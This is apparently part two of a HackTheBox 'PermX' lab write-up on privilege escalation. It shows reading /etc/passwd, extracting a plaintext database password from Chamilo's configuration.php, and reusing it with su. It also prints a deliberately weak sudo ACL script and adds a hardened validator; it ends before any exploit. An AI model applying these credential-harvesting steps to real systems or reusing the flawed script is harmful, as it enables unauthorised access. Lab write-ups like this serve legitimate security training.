[HackTheBox] PermX – Easy – Part II – Privilege Escalation


Web directory

Information gathering with the current privileges

www-data@permx:/home$ ls
mtz
www-data@permx:/home$ grep 'sh$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
mtz:x:1000:1000:mtz:/home/mtz:/bin/bash

The web directory contains two folders:

www-data@permx:/var/www$ ls
chamilo  html
www-data@permx:/var/www$ ls html/
404.html  LICENSE.txt  READ-ME.txt  about.html  contact.html  courses.html  css  elearning-html-template.jpg  img  index.html  js  lib  scss  team.html  testimonial.html

The Chamilo instance

www-data@permx:/var/www$ ls chamilo/
CODE_OF_CONDUCT.md  README.md             bin           cli-config.php  composer.lock  favicon.ico  license.txt    plugin      terms.php     vendor       whoisonline.php
CONTRIBUTING.md     app                   bower.json    codesize.xml    custompages    favicon.png  main           robots.txt  user.php      web          whoisonlinesession.php
LICENSE             apple-touch-icon.png  certificates  composer.json   documentation  index.php    news_list.php  src         user_portal.php  web.config

cli-config.php does not reveal any credentials, but it references another configuration file:

$configurationFile = __DIR__.'/app/config/configuration.php';

That file is long, but it begins with the database connection settings:

<?php
// Chamilo version 1.11.24
// File generated by /install/index.php script - Sat, 20 Jan 2024 18:20:32 +0000
/* For licensing terms, see /license.txt */
/**
 * This file contains a list of variables that can be modified by the campus site's server administrator.
 * Pay attention when changing these variables, some changes may cause Chamilo to stop working.
 * If you changed some settings and want to restore them, please have a look at
 * configuration.dist.php. That file is an exact copy of the config file at install time.
 * Besides the $_configuration, a $_settings array also exists, that
 * contains variables that can be changed and will not break the platform.
 * These optional settings are defined in the database, now
 * (table settings_current).
 */

// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
...[snip]...

The password is "03F6lY3uXAP2bkW8".

Sudo/SSH

www-data@permx:/var/www/chamilo$ su mtz
Password: 
mtz@permx:/var/www/chamilo$

At this point we have obtained user-level access.

Root privileges

Information gathering with the current privileges

mtz@permx:~$ ls -la
total 32
drwxr-x--- 4 mtz  mtz  4096 Jun  6 05:24 .
drwxr-xr-x 3 root root 4096 Jan 20 18:10 ..
lrwxrwxrwx 1 root root    9 Jan 20 18:12 .bash_history -> /dev/null
-rw-r--r-- 1 mtz  mtz   220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 mtz  mtz  3771 Jan  6  2022 .bashrc
drwx------ 2 mtz  mtz  4096 May 31 11:14 .cache
lrwxrwxrwx 1 root root    9 Jan 20 18:37 .mysql_history -> /dev/null
-rw-r--r-- 1 mtz  mtz   807 Jan  6  2022 .profile
drwx------ 2 mtz  mtz  4096 Jan 20 18:10 .ssh
-rw-r----- 1 root mtz    33 Jan 20 18:16 user.txt

sudo

mtz can use sudo to run a Bash script as any user:

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

The script lets the user set a file access control list (FACL) on a file:

#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
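
The script above tests the path string the caller typed and passes user and perm straight into the ACL entry. For comparison, here is a stricter validator that canonicalises the path before the prefix test and constrains both fields. It is an added example, not part of the original post or of the box's /opt/acl.sh; ALLOWED_BASE and the two function names are assumptions.

```bash
#!/bin/bash
# Added example, not the script from the box. ALLOWED_BASE and both function
# names are assumptions made for this sketch.
ALLOWED_BASE="${ALLOWED_BASE:-/home/mtz}"

# Print the canonical path and return 0 only for an acceptable ACL target.
resolve_acl_target() {
    local target="$1" base resolved
    base="$(readlink -f -- "$ALLOWED_BASE")" || return 1
    [ -d "$base" ] || return 1

    # Absolute paths only, and the final component must not be a symlink.
    case "$target" in /*) ;; *) return 1 ;; esac
    [ -L "$target" ] && return 1

    # Canonicalise: resolves symlinks in every directory component and
    # collapses "." and "..", so the prefix test sees the real location.
    resolved="$(readlink -f -- "$target")" || return 1
    case "$resolved" in "$base"/*) ;; *) return 1 ;; esac

    # Regular file with exactly one name (link count 1).
    [ -f "$resolved" ] || return 1
    [ "$(stat -c %h -- "$resolved")" -eq 1 ] || return 1

    printf '%s\n' "$resolved"
}

# Accept only an existing account and a mode built from r, w, x and "-".
valid_acl_entry() {
    local user="$1" perm="$2"
    id -u -- "$user" >/dev/null 2>&1 || return 1
    case "$perm" in ''|*[!rwx-]*) return 1 ;; esac
    [ "${#perm}" -le 3 ]
}
```

A wrapper would pass the printed canonical path to setfacl rather than the caller's string. The check and the setfacl call remain two separate steps, so the directory's contents can still change between them while the caller can write to it.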

To be continued…
